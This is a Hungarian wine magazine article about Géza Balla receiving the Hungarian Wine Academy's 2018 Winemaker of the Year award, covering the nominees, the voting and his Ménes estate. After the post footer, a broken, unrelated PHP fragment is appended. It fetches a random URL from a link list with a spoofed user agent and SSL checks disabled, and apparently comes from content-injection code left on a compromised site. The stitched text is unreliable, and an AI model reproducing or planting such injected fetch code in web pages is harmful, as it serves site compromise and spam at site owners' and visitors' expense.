Balla Géza az Év Bortermelője

December 5-én, szerdán ünnepélyes keretek között hirdették ki a Magyar Bor Akadémia az „Év Bortermelője Magyarországon 2018” díj nyertesét, amellyel a szakmai testület a bortermelő több éven át tartó kiemelkedő teljesítményét, borainak mindig kiváló minőségét és a borszakmáért tett erőfeszítéseit ismeri el. Fotó: Magyar Bor Akadémia A díjat Zilai Zoltán a Magyar Bor Akadémia elnöke... View Article


December 5-én, szerdán ünnepélyes keretek között hirdették ki a Magyar Bor Akadémia az „Év Bortermelője Magyarországon 2018” díj nyertesét, amellyel a szakmai testület a bortermelő több éven át tartó kiemelkedő teljesítményét, borainak mindig kiváló minőségét és a borszakmáért tett erőfeszítéseit ismeri el.

Fotó: Magyar Bor Akadémia

A díjat Zilai Zoltán a Magyar Bor Akadémia elnöke adta át, aki köszöntő beszédében elmondta, hogy az év bortermelőjének járó díj immár 28 éves, s hogy értékét bizonyítja a nagy érdeklődés, amely körbeveszi. „Nem túlzás azt állítani, hogy ez a borászok Kossuth-díja, a legnagyobb és legrangosabb szakmai elismerés Magyarországon” – tette hozzá. Mindemellett gazdasági hatása is van, hiszen, figyelmet irányít a győztes borászra, s ahogy a bortermelő népszerűsége nő, úgy piacbővülésre is számíthat.

Az elnök továbbá azt is elmondta, hogy a nyertes kiválasztása két szakaszból áll: az első a jelölés, a második a szavazás. A Bor Akadémia levélben kéri fel a szakértőket, híres borkedvelőket arra, hogy jelöljék a díjra azokat a bortermelőket, akiket méltónak tartanak az elismerésre, ők pedig válaszlevélben írják meg jelöltjeik nevét. Idén több mint 600 felkérést küldtek ki, és több mint 300 jelölés érkezett. A jelöltek közül az az öt borász kapott meghívást a díjátadóra, akik a legtöbb jelölést kapták. Ezek Balla Géza (Arad-hegyaljai borvidék), Borbély Tamás (Badacsonyi borvidék), Figula Mihály (Balatonfüred–Csopaki borvidék), Jásdi István (Balatonfüred–Csopaki borvidék) és Koch Csaba (Hajós–Bajai borvidék) voltak. Az öt jelölt közül pedig a Bor Akadémia 168 tagja szavazta meg a győztest. Ahogy az elnök fogalmazott: „Rossz döntést nem születhetett.” S valóban, a díjátadón megkóstolhattuk mindegyik jelölt egy-egy tételét, amelyek jól bizonyították, hogy mindannyian kiemelkedő minőségű borokat készítenek.

Balla Géza Arad-hegyaljai birtoka Fotó: ballageza.com

Kóstolás közben az öt jelölt bemutatkozott, valamint ismertették a megkóstolt tételeket is. Balla Géza ekkor kedélyesen anekdotázva mesélt partiumi birtokáról, s arról, miért nevezik Sziklabornak a fekete leányka-cabernet franc házasítást. Azonban miután bejelentették győzelmét, csak annyit tudott mondani a bőbeszédű borász: „Ez komoly?” Majd egy pohár víz után hozzátette: „Nagyon köszönöm. Ezt nem hiszem el. Szeretek beszélni, nemigen szoktam dadogni. De most… esetleg egy kicsit később.” Később pedig, miután feleszmélt a nagy öröm okozta sokkból, elmondta: „Hiszek a barátságban, hiszek abban, hogy a Kárpát-medence borászai nem egymás konkurensei. Mindig is a segítség, egymás segítése volt számomra az elsődleges.”

Balla Géza borai az Arad-hegyaljai, közismertebb nevén a Ménesi borvidéken készülnek, amely Partiumban, Aradtól 20 km-re keletre helyezkedik el. Ménes kiváló földrajzi fekvése, időjárása, talajadottságai (gránit, diorit és agyagpala), mikroklímája a vörösboroknak kedvez. A borász, aki elsőként telepített a környéken cabernet franc-t, 35 éve tevékenykedik a szakmában, ebből 20 éve már a saját pincészetében. 2008-tól a marosvásárhelyi Sapientia Tudományegyetem Kertészeti Karán a Szőlészeti és Borászati Tanszék vezetője, egyetemi adjunktus. Számos borszakmai tankönyv szerzője. 2004 óta a Magyar Bor Akadémia Tagja. Régóta célként tekintett arra, hogy egységes Kárpát-medencei, magyar borról beszélhessünk. Fontosnak tartja, hogy a majdnem feledésbe merült fajtákat, visszaemelje méltó helyükre, például a kadarkát vagy a feketeleánykát. Ez utóbbi egy régi dél-erdélyi fajta, amely még Mátyás király seregéről kapta a nevét.

(Visited 4 times, 4 visits today)

The post Balla Géza az Év Bortermelője appeared first on VinCE Magazin.


html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>